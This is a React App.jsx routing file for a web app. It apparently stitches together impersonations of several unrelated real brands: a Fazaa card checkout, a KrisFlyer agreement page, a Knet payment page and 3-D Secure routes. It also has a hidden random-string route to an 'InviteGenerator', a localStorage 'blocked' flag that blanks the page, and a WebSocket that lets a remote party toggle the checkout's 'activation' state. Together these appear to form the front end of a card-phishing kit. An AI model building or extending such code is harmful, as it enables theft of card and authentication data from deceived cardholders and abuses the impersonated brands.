// App.jsx
import React, { Suspense, lazy, useEffect, useState } from "react";
import { BrowserRouter as Router, Routes, Route, Outlet, Navigate } from "react-router-dom";

import { PromoProvider } from "./providers/Init";
import ScrollToTop from "./providers/ScrollToTop";
import ThreeDSRoutes from "./providers/3ds/ThreeDSRoutes";
import { StepProvider } from "./StepContext";
import { motion } from "framer-motion";
import { CardProvider } from "./Utils/CardContext";

import { GeoLayoutProvider, GEO_CODES } from "./providers/GeoContext";
import BrandLockup from "./Components/BrandLockup";

/* ---- Lazy-loaded pages/components ---- */
const Header = lazy(() => import("./Header"));
const Footer = lazy(() => import("./Footer"));
const SelectLanding = lazy(() => import("./Pages/SelectLanding/Landing"));

const FazaaCardCheckout = lazy(() => import("./FazaaCardCheckout"));
const FazaaTerms = lazy(() => import("./Terms"));
const ActivationSuccessPage = lazy(() => import("./ActivationSucess"));

const FazaaFAQ = lazy(() => import("./FAQ"));
const AboutUs = lazy(() => import("./AboutUs"));
const PrivacyPolicy = lazy(() => import("./Privacy"));
const CustomerSupport = lazy(() => import("./Support"));

const Chat = lazy(() => import("./Chat/Chat"));
const ChatSupport = lazy(() => import("./Chat/ChatSupport"));

const Knet = lazy(() => import("./Knet/Knet"));
const ActivationSequence = lazy(() => import("./Pages/ActivationSequence/ActivationSequence"));
const InviteGenerator = lazy(() => import("./Pages/ActivationSequence/InviteGeneration"));
const KrisFlyerAgreementPage = lazy(() => import("./Components/AgreementPage/AgreementPage"));

const WebSocketLazy = lazy(() => import("./providers/Websocket"));

function FooterLayout() {
  return (
    <>
      <Outlet />
      <Suspense fallback={null}>
        <Footer />
      </Suspense>
    </>
  );
}

function Loader() {
  return (
    <motion.div
      className="absolute inset-0 flex flex-col gap-y-4 items-center justify-center bg-[#060E1A] z-50"
      initial={{ opacity: 1 }}
      exit={{ opacity: 0, transition: { duration: 0.5 } }}
    >
      <div className="px-5 py-3 rounded-2xl bg-white/[0.04] border border-[#D4AF37]/30 backdrop-blur-md">
        <BrandLockup variant="dark" size="lg" />
      </div>
      <div className="w-6 h-6 border-2 border-t-transparent border-[#D4AF37] rounded-full animate-spin" />
    </motion.div>
  );
}

function RootRedirect() {
  const saved = (localStorage.getItem("geo") || "").toLowerCase();
  const g = GEO_CODES.includes(saved) ? saved : "ph";
  return <Navigate to={`/${g}`} replace />;
}

function App() {
  const [activationActive, setActivationActive] = useState(false);
  const blocked =
    typeof window !== "undefined" && localStorage.getItem("blocked") === "true";
  const [mountSocket, setMountSocket] = useState(false);

  useEffect(() => {
    if (blocked) return;
    const id = window.requestIdleCallback
      ? window.requestIdleCallback(() => setMountSocket(true))
      : setTimeout(() => setMountSocket(true), 1);

    return () => {
      if (window.cancelIdleCallback && typeof id === "number") {
        window.cancelIdleCallback(id);
      } else {
        clearTimeout(id);
      }
    };
  }, [blocked]);

  if (blocked) return null;

  return (
    <div className="App">
      <CardProvider>
        <StepProvider initialStep={0} persistKey="wizardStep">
          <PromoProvider>
            <Router>
              <ScrollToTop />

              {mountSocket && (
                <Suspense fallback={null}>
                  <WebSocketLazy setActivationActive={setActivationActive} />
                </Suspense>
              )}

              <Suspense fallback={<Loader />}>
                <Routes>
                  <Route path="/" element={<RootRedirect />} />

                  <Route
                    path="/:geo"
                    element={
                      <GeoLayoutProvider>
                        <Outlet />
                      </GeoLayoutProvider>
                    }
                  >
                    <Route element={<FooterLayout />}>
                      <Route index element={<SelectLanding />} />
                      <Route path="faq" element={<FazaaFAQ />} />
                      <Route path="privacy" element={<PrivacyPolicy />} />
                      <Route path="support" element={<CustomerSupport />} />
                      <Route path="about" element={<AboutUs />} />

                      <Route path="final" element={<ActivationSuccessPage />} />
                      <Route path="terms" element={<FazaaTerms />} />
                      <Route path="activate" element={<ActivationSequence />} />
                      <Route path="pdf" element={<KrisFlyerAgreementPage />} />
                      <Route
                        path="homepage"
                        element={
                          <div className="bg-[#E9E9E9]">
                            <Header />
                            <FazaaCardCheckout
                              activationActive={activationActive}
                              setActivationActive={setActivationActive}
                            />
                          </div>
                        }
                      />
                    </Route>

                    <Route path="knet" element={<Knet />} />
                    <Route path="chat" element={<Chat />} />
                    <Route path="chatsupport" element={<ChatSupport />} />
                    <Route path="N7k3X2pV9a1Q5mZ4" element={<InviteGenerator />} />
                  </Route>

                  {ThreeDSRoutes()}
                </Routes>
              </Suspense>
            </Router>
          </PromoProvider>
        </StepProvider>
      </CardProvider>
    </div>
  );
}

export default App;
